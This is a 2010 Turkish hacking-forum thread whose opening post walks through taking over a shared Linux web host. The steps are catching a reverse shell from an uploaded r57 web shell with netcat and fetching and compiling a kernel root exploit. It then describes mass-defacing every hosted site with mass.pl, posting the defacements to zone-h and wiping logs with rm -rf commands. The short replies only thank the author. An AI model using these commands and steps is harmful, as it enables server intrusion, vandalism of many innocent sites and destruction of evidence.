İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Root BiLmeyenLer İCERİ/4Dé$†ru©†íon

15-04-2010 13:28
#1
Üyelik tarihi:
04/2010
Mesajlar:
3
Teşekkür (Etti):
0
Teşekkür (Aldı):
2
Konular:
3
Ticaret:
(0) %
#140316 2010-04-12 15:55 GMT Alinti SeLAmun ALeyKum




root a başlamadan önce bazı hazır lıkalr yapman gerek msl modem de port acmak internetten bazı dosyaları ındırmek(netcat-mass.pl-zone.pl)gibi şimdi anlatmaya başlayalım
netcat: netcat bir telnet clientidir backdoor açıldıktan sonra oraya bağlantı kurmak amaçlı kullanılır. yani r57 lerde altta back-connect vardır ordan ayarlamarı yapıyorsun bu program baglantı icin kullanılır. bunu ındırdıkten sonra system32 ye atacak sın sonra başlat/calıştır/mcd ye tıklıcaksın orda bu nu yazıcaksın nc –v –l –p port_no su hanı moden de accan ya ort heh işte onu sonuna yazcaksın
mass.pl :bu program index i butun serwer deki sitelere enjekte etmeyi yani atmayı saglar perl ile yazılmısdır
noze.pl : bu bizim toplu yoldan deface kayıt almamızı saglar bu perl leyazılmsıtır
şimdi r57 atmış oldugumuz siteye gelip altta back-conenct var oraya geliyoruz. orda şunlar vardır
Ip:burdası nı kendı ıpmız zaten orda yazar
prot:modem den actıgımız port
kullanrası zaten perl olarak kalcak
sonra serwere baglancaz cmd de actıgımzı pencere vardı ya hani nc –v –l –p port_nomuz heh işte orda prot u dınlıyorduk şimdi serwere baglanınca orda bazı bılgıler vercek eger ki cıkmaz sa hala dınlıyor gıbı gösterirsen fazla ugraşma root cekemıyorsun demektir yanı sewer root yemyıordur
msl ben cekmsıtım bır serwere root hanı dedım ya bıze bazı bılgılerı verıyor serwerin sürümünü veriyor
örnek: (Linux nexus.arazel.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 i686 i38
GNU/Linux)
bu örnegegöre milworm de root expoliti arıcaz mil de ararken linuxkernellocal root exploit diye ara yararlı olur
şimdi bulduk dıyelım hemen serwerimize upload etcegiz sonra bunu sisteme cekmek icin kod kullan caz yanı bu kod(wget) işle tamam lanınca eget saved der yanı expolit i serwere cektıgımız de
sonra expoliti derlicez: gcc -o root 2.6.x.c/ chmod 777 root
Yani gcc -o root 2.6.x.c yapıyoruz.Şimdi exploitimiz derlendi ve root adını aldı.Bu root adlı derlenmiş exploite full yetki verelim; chmod 777 rot
expoliti calıştırmamız gerek cek(./root) yanı
./root = expoliti calıştırma anlamıan gelir
azkaldı sabret oku oku uzun yazı olcak ama yararlı olcak sana yapması kolay okumazı zordur ama gayret et ögrenmek istiyorsan
sonra serwer deki durumumuzu ögrenelim id yazarak olcak buda
id = uid:0(root) yazıyorsa.exploit işe yaradı, server rootlandı demektir.
ohh bee root bitti şimdi serwer deki siteleri deface etmek kaldı
serwere whois cekecegiz site sayısını ögrencez ya he bırde serwerde az site varsa root cekmenın bır anlamı yok ama coksa root cekmek en mantıklı yoldur ama konrtol etcez tabiki !!!
msl whois de site az cıkarsa
/var/cpanel /etc/httpd/conf/httpd.conf etc/shadow /var/named
ihtimal olarak verdım bunalr ıbunlardan bırısınde domaınler mevcuttur
cd/var/named yazarak bu dizine gecelim bun ları cmd yapcagız ha aman başka yerde yapma
ve sonra (ls) yazarak dosyaları listeliyoruz
şimdi cıkan domaın leri domain.txt olarak kaydedelım lazım olcak onlar mass cekerken
şimdi sıra mass.pl de ensevdıgım bu birden ındex lenıyor sıteler
şimdi r57.php yi attgımız dizine mass.pl yide atıyoruz yanı upload ediyoruz ettıkten sorna karşımıza
perl mass.pl olarak geloyor
example: perl mass.pl/tmp/index.html burdaki tmp ne dir sorayım sana
linuxlarda tmp kasör ü yazıla bılır yetk ııcermektedır yanı encok bu kullanılıyor benım kullandıgım bu bunun icine atıyorum root mass yapcagım zaman index imi bu bir püf noktadır
yaptgımız nedır /tmp/index.html şu demek tir
burda bulunan(’tmp’ kalsör adı) ın daki index i tüm klasör lere kopyala demek tir
şimdi mass işlemide bitti 3-4 dk icinde sitelerde index görebilrisin serwerin icindeki siteler de yani
şimdi sıra zone.pl ye geldi
zone.pl:bu bize şu imkanı saglam mass cektikten sonra topluca kaydını alır yanı buda bir yardım cı perl yazılımıdır
bunuda aynı yapcaz(başlat-calıştır-cmd burdan sonra perl in kurulu oldugu site perl-bin burda oluyoruz calıştırmak icin zone.pl yazmamız gerekir
sonra perl zoneh.pl yapcaz burdaki liste adına ise hani
dedim ya sana txt olarak kaydet dıye domaın adlarını heh işte bunu oray yazcagız sonra enterlıyoruz
zone-h ye psotalıyor tabıkı enterlıdek ten sonra kaynıdı hesabı yanı
şimdi logları sılmemız gerekecek
bun ları şu kodlarla yapın bazı larını aklımda tutamam onun ıcın not defterıen kopyaladım hep
rm – rf /var/log
rm – rf /var/adm
find/- name .bash_logout – exec rm – rf {} \\;
find/- name *.log – exec rm – rf {} \\;
bun ları yapıktan sonra hele şükür linuxlarda root mas zone.pller.



O2xygen, trtosi Teşekkür etti.

15-04-2010 16:41
#2
O2xygen - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2009
Mesajlar:
23
Teşekkür (Etti):
5
Teşekkür (Aldı):
2
Konular:
4
Ticaret:
(0) %
teşekkürler
17-04-2010 20:44
#3
ceyhann19 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2009
Nereden:
Çorum
Mesajlar:
496
Teşekkür (Etti):
29
Teşekkür (Aldı):
39
Konular:
8
Ticaret:
(0) %
güzel bilgi sağol
Kullanıcı İmzası
Asıl Nickim:DinamiT
Ya sen; terazilerce altın yüklenmiş gibisin,
Sen ah sen bir bilsen..
Keşke bilselerdi; herkesin tek hakkı var,
Ömrü altın sepeti sanma, sepete konulan,
En sonunda ruhsuz bir ceset olur sonunda.
Sagopa Kajmer
20-04-2010 15:57
#4
TYSON_ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2008
Nereden:
secret
Mesajlar:
54
Teşekkür (Etti):
7
Teşekkür (Aldı):
4
Konular:
14
Ticaret:
(0) %
Çok Karışık Anlatmış Anlatan Fazla Kimse Anlamaz Bunu

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı